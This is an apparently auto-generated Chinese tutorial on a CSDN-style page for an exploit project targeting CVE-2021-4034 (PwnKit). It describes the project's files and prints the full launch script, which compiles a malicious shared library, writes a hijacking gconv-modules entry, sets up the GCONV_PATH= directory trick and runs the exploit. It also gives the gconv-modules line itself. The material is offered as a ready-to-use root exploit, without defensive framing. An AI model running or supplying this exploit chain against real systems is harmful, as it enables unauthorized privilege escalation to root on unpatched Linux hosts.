CVE-2021-4034 项目使用教程

CVE-2021-4034 项目使用教程

CVE-2021-4034CVE-2021-4034 1day项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2021-4034

1. 项目的目录结构及介绍

CVE-2021-4034 项目的目录结构如下:

CVE-2021-4034/
├── cve-2021-4034.c
├── cve-2021-4034.sh
├── gconv-modules
├── LICENSE
├── Makefile
├── pwnkit.c
├── README.md
└── GCONV_PATH=
    └── pwnkit.so

各文件和目录的介绍如下:

  • cve-2021-4034.c: 主程序源文件。
  • cve-2021-4034.sh: 启动脚本。
  • gconv-modules: 配置文件,用于指定字符转换模块。
  • LICENSE: 项目许可证文件。
  • Makefile: 编译配置文件。
  • pwnkit.c: 辅助程序源文件。
  • README.md: 项目说明文档。
  • GCONV_PATH=: 目录,包含生成的 pwnkit.so 文件。

2. 项目的启动文件介绍

项目的启动文件是 cve-2021-4034.sh。该脚本的主要功能是编译和运行 cve-2021-4034 程序。脚本内容如下:

cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so
./cve-2021-4034

该脚本首先编译 pwnkit.c 生成 pwnkit.so,然后编译 cve-2021-4034.c 生成可执行文件 cve-2021-4034,最后运行 cve-2021-4034 程序。

3. 项目的配置文件介绍

项目的配置文件是 gconv-modules。该文件用于指定字符转换模块,内容如下:

module UTF-8// PWNKIT// pwnkit 1

该配置文件指定了 pwnkit 模块用于字符转换。在运行 cve-2021-4034 程序时,系统会根据该配置文件加载 pwnkit.so 模块。

以上是 CVE-2021-4034 项目的使用教程,希望对您有所帮助。

CVE-2021-4034CVE-2021-4034 1day项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2021-4034

  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孔卿菡Warrior

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值